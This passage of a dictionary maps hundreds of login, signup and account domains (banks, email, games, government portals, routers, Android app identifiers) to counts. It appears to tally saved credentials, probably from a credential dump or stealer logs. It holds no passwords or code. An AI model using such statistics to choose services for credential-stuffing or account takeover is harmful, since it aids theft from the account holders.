'E93EC0BD-87BD-4933-9E3A-89160C088DA9': 28, 'signup.tr.leagueoflegends.com': 28, 'localhost': 27, 'minecraft.net': 27, 'busandal17.net': 27, 'login.siat.sat.gob.mx': 27, 'faceit.com': 26, 'account.live.com': 25, 'amazon.in': 25, '79xEc7TXh3cNp5rV9kci8i6AYyfPq8BmRomGIiNpLtXCAx3qy5RICnOQLbMJaQ1UNGV_N7sSK1dLpTmEZQ8csg==@com.spotify.music': 25, 'mail.google.com': 24, 'appleid.apple.com': 24, 'help.steampowered.com': 24, 'tr-tr.facebook.com': 24, 'cfdiau.sat.gob.mx': 24, 'adobeid.services.adobe.com': 23, 'id.g2a.com': 23, 'busandal18.net': 23, 'opss53.com': 23, '100listbuilders.com': 23, 'sso.godaddy.com': 22, 'warframe.com': 22, 'xvideos.com': 22, 'bamview.net': 22, 'busandal16.net': 22, 'optok13.com': 22, 'nagaqiuqiu.info': 22, 'tr.elvenar.com': 22, 'sammobile.com': 21, 'login.skype.com': 21, 'eu.battle.net': 21, 'id.sonyentertainmentnetwork.com': 21, 'rOo56i6wJSuhTToG8s1V3ZsRmd-gv2eEMdqG75TFH2kmlRbK35kk8yIbEmg5-zWO37z1oX_cySDCoXW3THw79w==@com.contextlogic.wish': 21, 'bamwar1.cc': 21, 'opopgirl04.com': 21, '192.168.8.1': 20, 'dKranQB7c5H2WKHJF5rygyRh5-vrf7ZVODNX_XoJgJ5YncxgwK7vbH1kZrYCLmv68MEawe5nFA-sfKQk9mrbFQ==@tv.twitch.android.app': 20, 'ebay.com': 20, 'messenger.com': 20, 'funchoice14.net': 20, 'login.payoneer.com': 19, 'rx1M7HNclOtlTbka8IqBM_RA-PPzS-htzHtHBJQcOM2oNQSOsZxZF1j1MPteckITXrJ7xKh6mEC2HmKZpBwBrg==@com.snapchat.android': 19, 'u0A-O7Ivuokjnqmf1ciagyiwkxqsLSrXA9ZzyIb4yGEVu5tPRfhJbn8REHGmDAUkUCGf71TqwUcwSfwFObRssA==@com.twitter.android': 19, 'auth.api.sonyentertainmentnetwork.com': 19, 'passport.aliexpress.com': 19, 'funchoice16.net': 19, 'passport.alibaba.com': 18, 'pBowWSLvFMHp-Qulwesr2bSrcr9vsiPPhGed3xcXj5ZNJccRGvbP7pPFSqeoQ8NHooDFe29iIWzU_fETWE2UpQ==@com.linkedin.android': 18, 'shutterstock.com': 18, 'RGlUtI9NY0ps7eW1mdYoROkaZ3iIqThRr1OIJOwe5lqdRX93aUt2TxUUz13PLlTFN5B1C0mMDPyM4BsBic8Fmg==@com.roblox.client': 18, 'github.com': 18, 'sso.garena.com': 18, 'account.xiaomi.com': 18, 'adobeid-na1.services.adobe.com': 18, 'spotify.com': 18, 'mediafire.com': 18, 'pornhub.com': 18, 'funchoice15.net': 18, '192.168.10.1': 17, 'upwork.com': 17, '192.168.1.254': 17, 'wordpress.com': 17, 'soundcloud.com': 17, 'accounts.firefox.com': 17, 'vk.com': 17, 'uuhaja8.com': 17, 'portalsat.sat.gob.mx': 17, 'free.facebook.com': 16, 'amazon.es': 16, 'tumblr.com': 16, 'secure.indeed.com': 16, 'pinterest.com': 16, 'uuhaja.com': 16, 'pagseguro.uol.com.br': 15, 'nid.naver.com': 15, 'auth.uber.com': 15, 'signin.rockstargames.com': 15, 'reddit.com': 15, 'irctc.co.in': 15, 'us.battle.net': 15, 'opstar01.com': 15, 'BUi3vpJapuiQqpWQUdO7LVc7haroYELym0lKoadfKcXfV4LgV0V18zAGwx1jVqXQKZ2Xgdt5Yu_qeI3DHfPj1Q==@com.alibaba.aliexpresshd': 15, 'utopya.online': 15, 'tramitesdigitales.sat.gob.mx': 15, 'amazon.de': 14, 'giris.turkiye.gov.tr': 14, 'flipkart.com': 14, '192.168.2.1': 14, 'router.asus.com': 14, 'zQxb6hXv1MJiC1Yyotdhi8HP-y7fwPcOLwPOWTwWKpP2VXcbsuIiI4iJ1KV0Dz3LzVsUuKJmYCBIUAxnsPB9FA==@com.facebook.orca': 14, 'partis.si': 14, 'tlauncher.org': 14, 'opga6.com': 14, 'kajot-casino.com': 14, '2Q82TiAojrruN4q56Ttwb9pRQAkZ73TAEh2r0iatwKG7k2pb9_aRB1c9XJKShM5Dyc-tFk3cdk7gxb7FTpaKrw==@com.spotify.music': 14, 'idrnagaqq.com': 14, 'bs-ba.soccermanager.com': 14, 'account.skrill.com': 13, 'users.wix.com': 13, 'eJfCHemD_NTvScv_duWU058eFi_4wYqohmQf4scH7dpVmmryzRxqIGReUSnHagwVc8ZUne-OScD-rlVUWgfwvQ==@com.mercadolibre': 13, 'amazon.co.uk': 13, 'enem.inep.gov.br': 13, 'iforgot.apple.com': 13, 'secure.booking.com': 13, 'adal5.net': 13, 'adal7.com': 13, 'optok11.com': 13, 'opss51.com': 13, 'opga20.com': 13, 'apps.facebook.com': 13, 'account.e.jimdo.com': 13, 'login.teamviewer.com': 12, 'login.nvgs.nvidia.com': 12, 'freelancer.com': 12, 'coinbase.com': 12, 'paspor.siap-online.com': 12, 'account.sonyentertainmentnetwork.com': 12, '000webhost.com': 12, 'canva.com': 12, 'signup.euw.leagueoflegends.com': 12, 'ldd.tbe.taleo.net': 12, 'ro-ro.facebook.com': 12, 'signin.ebay.de': 12, 'accounts.snapchat.com': 12, 'member.neteller.com': 12, 'ams.swa.hp.com': 12, 'career5.successfactors.eu': 12, 'bamwar25.com': 12, 'koreaspot33.com': 12, 'optok12.com': 12, 'serasaconsumidor.com.br': 12, 'noip.com': 12, 'login.globo.com': 12, 'researchgate.net': 12, 'amazon.ca': 12, 'eu.wargaming.net': 12, 'pvpro.com': 12, 'rajanagaqq.com': 12, 'nagaqq99.org': 12, 'id-id.facebook.com': 12, '10.60.4.201:3128': 12, 'killthespammer.com': 12, 'plarium.com': 12, 't411.me': 12, 'passbook.epfindia.gov.in': 11, 'nexusmods.com': 11, 'humblebundle.com': 11, 'coinpot.co': 11, 'crunchyroll.com': 11, 'windscribe.com': 11, 'account.asus.com': 11, 'my.thetruthspy.com': 11, 'naver.com': 11, 'joygame.com': 11, 'wish.com': 11, 'udemy.com': 11, 'siceuc.ucol.mx': 11, 'telemensagemtitanicdoamor.com.br': 11, 'fiverr.com': 10, 'club.pokemon.com': 10, 'aternos.org': 10, 'unifiedportal-mem.epfindia.gov.in': 10, 'login.norton.com': 10, 'zamunda.net': 10, 'home.mcafee.com': 10, 'wonga.co.za': 10, 'conta.olx.com.br': 10, 'account.ubisoft.com': 10, 'latam.com': 10, 'patria.org.ve': 10, 'ctp.itcs.hpe.com': 10, 'hprc.int.hpe.com': 10, 'signin.ebay.co.uk': 10, 'standalone-proxy-prod.wsop.playtika.com': 10, 'bamwar.cc': 10, 'kakaobam.net': 10, 'bamwar2.cc': 10, 'opyanolja3.com': 10, 'luckycreek.com': 10, 'login.vivo.com.br': 10, 'cdn.digialm.com': 10, 'ALsdJ6xLleQ5kghkkVL4KSpsHH0OgTYFn6oDi9cs1Ry9OyE9Uz23oc8VxjlXhpfj27q1zNrlKVI-SVk7L9En5Q==@com.bukalapak.android': 10, 'sister.kopertis4.or.id': 10, 'arsenal.com': 10, 'kijiji.ca': 10, 'p8adBUqxiXn4FQU1leWzlZzNbDzYZ7hoK9n2CitabFeqG-e2sbMUN74dxso-M78VGRtGTmLjX1NeDn-MbA3SBA==@com.elmenus.app': 10, 'takipcihilesiyap.com': 10, 'place2use.net': 10, 'server.pro': 9, 'www3.olx.com.br': 9, 'connect.ubi.com': 9, 'dell.com': 9, 'hu-hu.facebook.com': 9, 'opskins.com': 9, 'wctWuKakwAKDfVz8mX57MZAbZVXmfVwlkN8yHs6TuGuEfxswKtHq5qxOWI0RPBi55t1j2td7DaRC_cF8R3qlUQ==@com.waze': 9, 'auth.netcombo.com.br': 9, 'www3.serasaconsumidor.com.br': 9, 'connect.dstv.com': 9, 'ctp-web.itcs.hp.com': 9, 'global.americanexpress.com': 9, 'pmi.taleo.net': 9, 'google.com': 9, 'amazon.com.br': 9, 'bamwar27.com': 9, 'acdna1.com': 9, 'funchoice17.net': 9, 'cliente.americanas.com.br': 9, 'pBmM_nO60893u4X7D-CanT76SomdRzEME86TJB9BGYmSJ9fDyuZ5RAw-Do1z4Ojw5T_uV-5fU4qvcGnyraIO2w==@mega.privacy.android.app': 9, 'authrfc.siat.sat.gob.mx': 9, 'accounts.logme.in': 9, 'upload.xvideos.com': 9, 'ifttt.com': 9, 'midnightmailer.com': 9, 'wizzair.com': 9, '192.168.100.1': 8, 'wallhere.com': 8, 'trello.com': 8, 'clixsense.com': 8, 'rF2BMtDX6N5uymxwf2Syvpr7kW1gTUHhATVyF8dhrmRE8mvmWQ1KwSOvcxAEnpM52kL_VrS3omH3kq-I6N6SRQ==@com.paypal.android.p2pmobile': 8, 'vimeo.com': 8, 'reg.ebay.com': 8, 'sso.teachable.com': 8, 'youtube.com': 8, 'business.facebook.com': 8, 'djagi.com': 8, 'edmodo.com': 8, 'neobux.com': 8, 'freebitco.in': 8, 'xnxx.com': 8, 'autentica.7setembro.com.br': 8, 'pornhubpremium.com': 8, 'laborum.cl': 8, 'bamwar2.kr': 8, 'opnolja.net': 8, 'opopgirl02.com': 8, 'opss365.com': 8, 'optok15.com': 8, 'bynogame.com': 8, '10.0.0.1': 8, 'redtube.com': 8, 'accounts.paytm.com': 8, 'wf.my.com': 8, 'zengaming.com': 8, 'mitelcel.com': 8, 'passport.lenovo.com': 8, '155.238.4.85:8080': 8, 'account.nicovideo.jp': 8, 'ajtzdyJMSU8SG4KWzvzcEds3H1arh2gZsHv23ORlY3-2WWLT2LQBDpgr0wUhShJLF7oO7cTjcpbQ8beQDtpv_A==@com.banggood.client': 8, 'unknowncheats.me': 8, 'ncore.cc': 8, 'pik.ba': 8, 'bukalapak.com': 8, 'safelistpro.com': 8, 'ts1.travian.hu': 8, 'botize.com': 8, 'signin.ebay.ca': 8, 'mail.ru': 8, 'account.mail.ru': 8, 'newsongbd.net': 8, 'es.scribd.com': 7, 'socialclub.rockstargames.com': 7, 'banggood.com': 7, 'm.pagseguro.uol.com.br': 7, 'yts.ag': 7, 'ar-ar.facebook.com': 7, 'secure.showmax.com': 7, 'pnet.co.za': 7, 'jofogas.hu': 7, 'moj.telekom.si': 7, 'join.secondlife.com': 7, 'nestle.taleo.net': 7, 'sjobs.brassring.com': 7, 'account.booking.com': 7, 'meutim.tim.com.br': 7, 'mail.com': 7, 'app.cfe.mx': 7, 'zeusr.sii.cl': 7, 'taringa.net': 7, 'yatong.info': 7, 'opssmaster.com': 7, 'clubttt.com': 7, 'sso.pokemon.com': 7, 'addmefast.com': 7, 'remotedesktop.google.com': 7, 'minha.oi.com.br': 7, 'carrinho.submarino.com.br': 7, 'servicossociais.caixa.gov.br': 7, 'fr-fr.facebook.com': 7, 'ryanair.com': 7, 'v3m.gtarcade.com': 7, 'login.oracle.com': 7, 'hobbyking.com': 7, 'path.com': 7, 'shopee.co.id': 7, 'passport.yandex.com': 7, 'siceuc2.ucol.mx': 7, 'login.wmtransfer.com': 7, 'grp02.id.rakuten.co.jp': 7, 'dominospizza.es': 7, 'secure.twitch.tv': 7, 'email.bol.uol.com.br': 7, 'bol.uol.com.br': 7, 'dailymotion.com': 7, 'servicos.oab-sc.org.br': 7, 'bnsp.go.id': 7, 'mailsy.net': 7, 'worldlargestsafelist.com': 7, 'richyrichmailer.com': 7, 'nvidia.com': 7, 'secure.newegg.ca': 7, 'e.mail.ru': 7, 'takipcizade.com': 7, 'fibertakipci.com': 7, 'signin.cafr.ebay.ca': 7, 'siteforge.jioconnect.com': 7, 'profu112.ro': 7, 'hitleap.com': 7, 'adjarabet.com': 6, 'peopleperhour.com': 6, 'zoom.us': 6, 'id.apple.com': 6, 'es-es.facebook.com': 6, '2dehands.be': 6, 'welcome2.wifi.id': 6, 'gokano.com': 6, 'elements.envato.com': 6, 'login.gsis.gr': 6, 'web.flypgs.com': 6, 'sarahah.com': 6, 'animaljam.com': 6, 'courses.edx.org': 6, 'jobmail.co.za': 6, 'hiresine.com': 6, 'boodle.co.za': 6, 'viewfines.co.za': 6, 'truckersmp.com': 6, 'login.gearbest.com': 6, 'chaturbate.com': 6, 'oauth.vk.com': 6, 'webmail.kinghost.com.br': 6, 'forum.gsmdevelopers.com': 6, 'forum.gsmhosting.com': 6, 'webmail.js.com': 6, 'login.szn.cz': 6, 'ciee.org.br': 6, 'splice.com': 6, 'accenture.taleo.net': 6, 'admin.viewcentral.com': 6, 'customers.autonomy.com': 6, 'g4t8220.houston.hp.com': 6, 'giffgaff.com': 6, 'hp.taleo.net': 6, 'hpe.taleo.net': 6, 'id.atlassian.com': 6, 'jira.kraftapps.com': 6, 'pmi.avature.net': 6, 'roche.taleo.net': 6, 'sso.carlsonwagonlit.com': 6, 'kaggle.com': 6, 'hackerrank.com': 6, 'jobs.ch': 6, 'booking.com': 6, 'online.telmex.com': 6, 'claveunica.gob.cl': 6, 'yeotalk22.com': 6, 'yatime5.com': 6, 'greencar.co.kr': 6, 'opguide1.com': 6, 'optok9.com': 6, 'adal8.com': 6, 'hong-bj3.com': 6, 'opssfriend.com': 6, 'nutaku.net': 6, 'secure.sahibinden.com': 6, 'seer.ufms.br': 6, 'm.oi.com.br': 6, 'play.spotify.com': 6, 'codeforces.com': 6, 'spankbang.com': 6, 'mytedata.net': 6, 'badoo.com': 6, 'launcherfenix.com.ar': 6, 'accounts.uber.com': 6, 'evernote.com': 6, 'loginda.siat.sat.gob.mx': 6, 'bc.vc': 6, 'upayto.com': 6, 'nogames.win': 6, 'portalsat.plataforma.sat.gob.mx': 6, 'login.ncsoft.com': 6, 'rPmhGamtAvT9nai1E6GwKaCwBh4gmIRokMJqKijONcWZT4AHRuPnYug3OUyrHk3mnkFZU0BgS9VP-S-FkeOMtw==@com.shopee.id': 6, 'id.elsevier.com': 6, 'beasiswalpdp.kemenkeu.go.id': 6, 'nagaqiuqiu.com': 6, 'webmail.clicksgroup.co.za': 6, 'payment.ikeja.co.za': 6, 'grp01.id.rakuten.co.jp': 6, 'onitw.net': 6, 'myaccount.unext.jp': 6, 'sistemas.anatel.gov.br': 6, 'sciencedirect.com': 6, 's-ufz0kKUpUSqHkCxu9V1mu5AuF8d3Jp-4ss0CYxfjeJK9U0RDh83d-w9F5i443h--q36tB1epb6OD53dxMZjA==@com.picsart.studio': 6, 'metin2server.com': 6, 'limundo.com': 6, 'frmpublicidad.com': 6, 'fa.talfighehonar.com': 6, 'listmoola.com': 6, 'freesafelistking.com': 6, 'ads-messenger.com': 6, 'viraladstore.com': 6, 'instantviralmailer.com': 6, 'login.belgacom.be': 6, 'login.leagueoflegends.com': 6, 'razerid.razer.com': 6, 'citromail.hu': 6, 'ts20.travian.hu': 6, 'yapo.cl': 6, 'qiwi.com': 6, 'ok.ru': 6, 'st.chatango.com': 6, 'account.konami.net': 6, 'aries.elluel.net': 6, 'cpanel.hostfree.nl': 6, '192.168.1.21': 6, 'metin2steel.in': 6, 'bireysel.ziraatbank.com.tr': 6, 'mail.bg': 6, 'sircad.sep.gob.mx': 6, 'indishare.me': 6, 'pfproducts.slack.com': 5, 'vacca.life': 5, 'myaccount.payoneer.com': 5, 'vVYe7_T601X7964K2F8XGG-d_rF5vEIrDvPzsbizPLQIC3JOKYZaay6Y6hgDvx6i_k5Mep8KuslfvKICzkdMMQ==@com.flipkart.android': 5, 'na.wargaming.net': 5, 'login.mathworks.com': 5, '0.facebook.com': 5, 'native-instruments.com': 5, 'PFqqqzLxKACD_9PDR7xonmoC6771RsbxJzwDn5LXxbmCMGKKcFiZV7Ec1ucJzRjzX61rXdW0RrM7YbyvQOQGIQ==@com.degoo.android': 5, 'app.infinityfree.net': 5, 'poczta.o2.pl': 5, 'allegro.pl': 5, 'airtel.in': 5, 'maverickcheats.eu': 5, 'needrom.com': 5, 'ais.osym.gov.tr': 5, 'web.airdroid.com': 5, 'crossout.net': 5, '75.127.62.86': 5, 'greenwaveps.com': 5, 'paymyfines.co.za': 5, 'account.bethesda.net': 5, 'bayt.com': 5, 'pt.socialclub.rockstargames.com': 5, 'simlitabmas.ristekdikti.go.id': 5, 'profil.wp.pl': 5, 'connect.ubisoft.com': 5, 'profile.oracle.com': 5, 'login.id.hp.com': 5, 'my.paysafecard.com': 5, 'online.dinersclub.si': 5, 'prouniremanescentes.mec.gov.br': 5, 'auth.garena.com': 5, 'm.aliexpress.com': 5, 'shoppingcart.aliexpress.com': 5, 'idm.netcombo.com.br': 5, 'minhateca.com.br': 5, 'bibliocad.com': 5, 'my.spyzie.com': 5, 'medtronic.taleo.net': 5, 'sourceforge.net': 5, 'bravenet.com': 5, 'idbroker.webex.com': 5, 'virginmedia.ie': 5, 'accounts.nintendo.com': 5, 'app.cfe.gob.mx': 5, 'db.x-se.ru': 5, 'app.monetizze.com.br': 5, 'entel.cl': 5, 'cmr.cl': 5, 'acceso.movistar.cl': 5, 'bne.cl': 5, 'busandal15.net': 5, 'opssvip.com': 5, 'funchoice18.net': 5, 'kCyQDzpaoAX2gs-1zdGPKNAeICb8LzRFOxa4NCq0jO8c8d_NFS_q-Y35bU3Nq3GmFV2lLurmNvIZa6YPYZwmWg==@com.pinterest': 5, 'ocul.to': 5, 'passport.dx.com': 5, 'acs.bkm.com.tr': 5, 'deviantart.com': 5, 'orcid.org': 5, 'nulled.to': 5, 'forum.tribogamer.com': 5, 'detran.sp.gov.br': 5, 'vunesp.com.br': 5, 'engie-electrabel.be': 5, 'netacad.com': 5, 'bikroy.com': 5, 'scribd.com': 5, 'torrentbd.com': 5, '192.168.1.2': 5, 'signup.eune.leagueoflegends.com': 5, 'emag.ro': 5, 'grammarly.com': 5, 'hentaiheroes.com': 5, 'es.aliexpress.com': 5, 'santandernet.com.br': 5, 'movicargamx.mx:2096': 5, 'academia.edu': 5, 'sso.garmin.com': 5, 'vdab.be': 5, 'gittigidiyor.com': 5, 'consulta.sat.gob.mx': 5, 'sscndaftar.bkn.go.id': 5, 'tplinkrepeater.net': 5, 'krunker.io': 5, 'stwlan.pucmm.edu.do': 5, 'afpcapital.cl': 5, 'login.aol.com': 5, 'ssoidp.cc.saga-u.ac.jp': 5, 'wifiportal.telenet.be': 5, 'connect.telenordigital.com': 5, '192.168.0.254': 5, 'accounts.nexon.net': 5, 'ncs.gov.in': 5, 'kupujemprodajem.com': 5, 'login.adf.ly': 5, 'antrian.imigrasi.go.id': 5, 'warez-bb.org': 5, 'accounts.zoho.com': 5, 'minhaconta.levelupgames.com.br': 5, 'goldenopsafelist.com': 5, 'prodigiouslist.com': 5, 'topprioritymailer.com': 5, 'classicsolomailer.com': 5, 'sizzlingsafelistmailer.com': 5, 'listunlocked.com': 5, 'mailthislist.com': 5, 'acesso.uol.com.br': 5, 'siac.dataprev.gov.br': 5, 'rF2BMtDX6N5uymxwf2Syvpr7kW1gTUHhATVyF8dhrmRE8mvmWQ1KwSOvcxAEnpM52kL_VrS3omH3kq-I6N6SRQ==@com.paypal.merchant.client': 5, 'www2.yapo.cl': 5, 'login.uvigo.es': 5, 'webmail.nextmedia.vn': 5, 'olx.com.ec': 5, 'twirpx.com': 5, 'webapp-st.pucmm.edu.do': 5, 'hmscompact.com': 5, 'accounts.tokopedia.com': 5, 'wf.mail.ru': 5, 'silvertakipci.com': 5, 'takipci1.com': 5, 'insfollow.com': 5, 't411.li': 5, 'rcgroups.com': 5, 'cloud2.cdnseguro.com:2199': 5, 'notebookreparos.com.br': 5, 'radio.guaracast.com.br': 5, 'unochapeco.edu.br': 5, 'u.wapka.com': 5, 'zimbra.netcons.com.cu': 4, 'iNVomlcGmaewqb8W6fcF3T3uBBmHQ_3aFagLF6S62Qh7acLqtXqP37dIvazWK2eU6hSAs7nsp06VCC8ubVQfOg==@sg.bigo.live': 4, 'my.stormfiber.com': 4, 'imagesol.co:2082': 4, 'imagesol.co:2095': 4, 'clickstoearn.com': 4, 'xoom.com': 4, 'icloud.com': 4, 'online-convert.com': 4, 'identity.trimble.com': 4, 'accounts.shutterstock.com': 4, 'pt.aliexpress.com': 4, 'uptobox.com': 4, 'account.garena.com': 4, 'insomnia.gr': 4, 'freesound.org': 4, 'account.envato.com': 4, 'akaipro.com': 4, 'www1.gsis.gr': 4, 'charity.maharashtra.gov.in:8060': 4, 'login.mailchimp.com': 4, 'revenuehits.com': 4, 'appsgate.iitm.ac.in': 4, 'gsuite.google.com': 4, 'surveymonkey.com': 4, 'waves.com': 4, 'tnebnet.org': 4, 'aeriagames.com': 4, '50VbOzF4Siv2bQu2zmydG75kkRePoT9HTNRn4sE7x9qyqWXEqd_LkGVNn7KbF4HIkoOrZqsWashk63i7uiLuLw==@com.enflick.android.tn2ndLine': 4, 'airdroid.com': 4, 'ttdsevaonline.com': 4, 'routerlogin.net': 4, 'selfcare.actcorp.in': 4, 'miwifi.com': 4, 'vodafone.com.tr': 4, 'sigortam360.com': 4, 'login.gaijin.net': 4, 'e-gate.gov.tt': 4, 'portal.incometaxindiaefiling.gov.in': 4, 'payouts.payoneer.com': 4, 'signup.na.leagueoflegends.com': 4, 'krb-sjobs.brassring.com': 4, 'emotionminer.com': 4, 'seek.co.nz': 4, 't.hugoenglish.com': 4, 'forums.nexusmods.com': 4, 'razer-id.razerzone.com': 4, 'mercadolivre.com.br': 4, 'netshoes.com.br': 4, 'lumen.ni.com': 4, 'td2.info.pl': 4, 'poczta.interia.pl': 4, 'account.lenovo.com': 4, 'sunat.gob.pe': 4, '192.168.70.125': 4, 'aliexpress.com': 4, 'epicgames.com': 4, 'freedoge.co.in': 4, 'panel.trdweb.com.ar': 4, 'poberaj.com:2083': 4, 'BnX9M66KmaqmzgqWgQxmbrJB_wO0ST53-DUZCnxDdLwf4JAsUtM2kKGudjeBclJFUquAP2JTpypk9qobA6PGMA==@com.discord': 4, 'secure.imvu.com': 4, 'tr.secure.imvu.com': 4, 'ebay.de': 4, 'secure.kanui.com.br': 4, 'account.leagueoflegends.com': 4, 'deezer.com': 4, 'auth.arduino.cc': 4, 'promocaomarcascampeas.com.br': 4, 'br.crossfire.z8games.com': 4, 'gate.gov.hu': 4, 'idp.gov.hu': 4, 'otpbankdirekt.hu': 4, 'comunidad.arq.com.mx': 4, 'login.blockchain.com': 4, 'reklama5.mk': 4, '127.0.0.1:8080': 4, 'localhost:8080': 4, 'energyjobline.com': 4, 'career2.successfactors.eu': 4, 'inspira.un.org': 4, 'my.smartrecruiters.com': 4, 'passport2.hp.com': 4, 'tas-creditsuisse.taleo.net': 4, 'eventbrite.com': 4, 'coursera.org': 4, 'faf2e.ouponlinepractice.com': 4, 'instapaper.com': 4, 'myunidays.com': 4, 'account.box.com': 4, 'gateway.hbogo.eu': 4, 'pyxis-link.com': 4, 'lp.babbel.com': 4, 'inalarm-online.mx': 4, 'axis.com': 4, 'sucursalvirtual.movistar.cl': 4, 'secure.falabella.com': 4, 'trabajando.cl': 4, 'mercadopublico.cl': 4, 'candidato.computrabajo.cl': 4, 'chiletrabajos.cl': 4, 'prezi.com': 4, 'eTRWwi8PoVF8PltLrutcuRNrANKOnogSVek1ptfAM-538jYT3BB6jzXp1H6q3EJCtq-Cx5hLhMjd4-5KW0UY4w==@com.macrovideo.v380': 4, 'kr.myiqos.com': 4, 'showbam.com': 4, 'bamwar26.com': 4, 'ganda5.com': 4, 'yeotalk21.com': 4, 'm.smartfile.co.kr': 4, 'djchoice5.net': 4, 'sbam11.com': 4, 'cool365.co.kr': 4, 'v10-vvv.com': 4, 'yt330.org': 4, 'optok7.com': 4, 'yt550.org': 4, 'bamkkot11.cf': 4, 'opgirls59.me': 4, '5pya2.com': 4, '10.10.0.5': 4, 'chomikuj.pl': 4, 'app.clearscore.com': 4, 'samsung.com': 4, 'signin.ebay.es': 4, 'pedalbox.com': 4, 'steamunlock.com': 4, 'ifortuna.cz': 4, '7fmduHKTdHHrlMvldlEqAIlSfii1tl35bxj1OXN5Ve8c4lU6URVu4xtSHc3BVZxS6WWJnxMDhIfQN0N0K2NDJg==@com.google.android.gm': 4, 'intranet.fael.edu.br': 4, 'br.privalia.com': 4, 'academico.ifms.edu.br': 4, 'wwws.cnpq.br': 4, 'sky.com.br': 4, 'soarmp3.com': 4, 'accountrecovery.mercadolivre.com.br': 4, 'osu.ppy.sh': 4, 'carrinho.americanas.com.br': 4, 'carrinho.casasbahia.com.br': 4, 'centerplex.com.br': 4, 'secure.luminus.be': 4, 'proximus.be': 4, 'placementseason668.examly.io': 4, 'nextstep.tcs.com': 4, 'mi.movistar.com.ve': 4, 'fuathoca.net': 4, 'dirbs.pta.gov.pk': 4, 'crazyhd.com': 4, 'dlive.tv': 4, 'admin.otelz.com': 4, 'expediapartnercentral.com': 4, 'tui-destimo.de': 4, 'otelsnet.com': 4, 'members.hotel2sejour.com': 4, 'tui-destimo.com': 4, 'hotels.iati.com': 4, 'archivsystem.tui.com': 4, 'is.kultur.gov.tr': 4, 'content.odeontours.com': 4, 'admin.booking.com': 4, '9nLVOfkRsze37aYy5W3ix1ymtNU9WzPMhz9UTB2TefAKEnJYQkHerDj7iP_ODSZ-XXMktA-k0umxFMhWabfr4g==@com.pandavpn.androidproxy': 4, 'bueteeearchives.net': 4, 'mathworks.com': 4, 'redtubepremium.com': 4, 'localdates6.com': 4, 'torrentbd.net': 4, '172.24.23.37': 4, 'localhost:81': 4, '172.24.23.38': 4, 'digialm.com': 4, 'work.facebook.com': 4, 'account.heroesandgenerals.com': 4, 'totaljerkface.com': 4, 'pcgarage.ro': 4, 'wix.com': 4, 'minecraft-romania.ro': 4, 'hirezstudios.com': 4, 'yts.am': 4, 'signup.lan.leagueoflegends.com': 4, 'www2.jofogas.hu': 4, 'localhost:4343': 4, 'mail5005.smarterasp.net': 4, 'micuenta.infonavit.org.mx': 4, 'OOzdSEud0D3ocrJZnneyTsxFgkMlYaQEp4A6gX-j4DBVe7Lecf_KLydHcjA6Q0apfZUcFGIK1UqAwcl8cd6I8w==@com.huawei.android.instantshare': 4, 'cms-usa.xtream-codes.com': 4, 'cineplanet.com.pe': 4, 'www3.yggtorrent.to': 4, 'online.vfsglobal.com': 4, 'www6.yggtorrent.to': 4, 'infojobs.net': 4, 'gorunum.mobi': 4, 'instabayim.com': 4, 'r2games.com': 4, 'gameflip.com': 4, 'panelist.cint.com': 4, 'atlantis-ro.info': 4, 'es.elsword.gameforge.com': 4, 'ragnarok.life': 4, 'pccomponentes.com': 4, 'PIZ0g5eXIt_a_9zvV3npAVuXD5qARgSB5ywp1rJyXWJIA-wUNjCxmd3uEd6VXfz7yWZIZR-brOQXjXI2uehigg==@com.julofinance.juloapp': 4, 'sister.ristekdikti.go.id': 4, 'member.plti.co.id': 4, 'webmail.uninus.ac.id': 4, 'popcornvod.com': 4, 'scopus.com': 4, 'sinta2.ristekdikti.go.id': 4, 'xsplit.com': 4, 'ga_XcxkaCEgIy1By76LwD1S0_YOWa1gANnKhhmOEomlFhgZCsN4yVJhcvmqMP4e2mxTfQVQVrNh5h3F7G9bRPg==@net.one97.paytm': 4, 'mail4india.com': 4, 'project-infinity.cloud': 4, '5L58Z0JSaOnzgnkOtHmpM6dFq90cgrC7ODp3xeS_84ctr0g5vRdisOiZxJF_6RS4fzjDaY3rJ6y9S2tO9Kpl7A==@iflix.play': 4, '192.168.1.22': 4, 'www1.sii.cl': 4, 'myclassroom.cput.ac.za': 4, 'hotspot.alwayson.co.za': 4, 'mweb.purchases.fon.com': 4, 'wifi.telkom.co.za': 4, 'my.nsfas.org.za': 4, 'imperial.logistics.erecruit.co.za': 4, 'shoprite.erecruit.co.za': 4, 'mql5.com': 4, 'careers.clicksgroup.co.za': 4, 'xm.com': 4, 'secure.tdmarkets.com': 4, 'ctfx.co.za': 4, 'muvflix.com': 4, 'pay.skrill.com': 4, 'mini.wmtransfer.com': 4, 'live.mobicred.co.za': 4, 'mpowafin.co.za': 4, 'udu.co.za': 4, 'id.nedbank.co.za': 4, 'secured.nedbank.co.za': 4, 'fnb.co.za': 4, 'brazilianbigbutts.com': 4, 'myfxbook.com': 4, 'id.avast.com': 4, 'grp03.id.rakuten.co.jp': 4, 'login.yahoo.co.jp': 4, 'shusseki.oge.saga-u.ac.jp': 4, 'member.id.rakuten.co.jp': 4, 'rakuten-card.co.jp': 4, 'getpocket.com': 4, 'proximus.portal.fon.com': 4, 'my.actiris.be': 4, 'randstad.be': 4, 'arcgames.com': 4, 'filelist.ro': 4, 'inbotosani.ro': 4, 'guabinagame.com': 4, 'penpalworld.com': 4, 'support.steampowered.com': 4, 'egypt.souq.com': 4, 'hdfull.tv': 4, 'portal.rtb.ie': 4, 'vergol.com': 4, 'easy-firmware.com': 4, 'pordescargadirecta.com': 4, 'cheater.fun': 4, 'maisinsta.com.br': 4, 'm.likesforinsta.com': 4, 'hublaagram.me': 4, 'cotilloncasaalberto.com.ar': 4, 'aerolineas.com.ar': 4, 'servicioscorp.anses.gob.ar': 4, 'interferencias.speedy.com.ar': 4, 'bapagos.dguiaf-gcba.gov.ar': 4, 'adtargentina.com.ar': 4, 'conta.ebanx.com': 4, 'sistemasenem2.inep.gov.br': 4, 'sisualuno.mec.gov.br': 4, 'profile.callofduty.com': 4, 'eventosacademicos.ufmt.br': 4, 'fyp.ebay.com': 4, 'accounts.freemail.hu': 4, 'bhfanaticos.com': 4, '192.168.15.1': 4, 'epupns.bkn.go.id': 4, 'geniemailer.com': 4, 'website-traffic-hog.com': 4, 'safelistextreme.com': 4, 'guaranteedsolomails.com': 4, 'hotwebsitetraffic.com': 4, 'mightymousemailer.com': 4, 'lucky7mailer.com': 4, 'thelastmailer.com': 4, 'boomingwebsitetraffic.com': 4, 'identity.koodomobile.com': 4, 'theevolutionmailer.com': 4, 'email-hog.com': 4, 'central.brlogic.com': 4, 'session.trionworlds.com': 4, 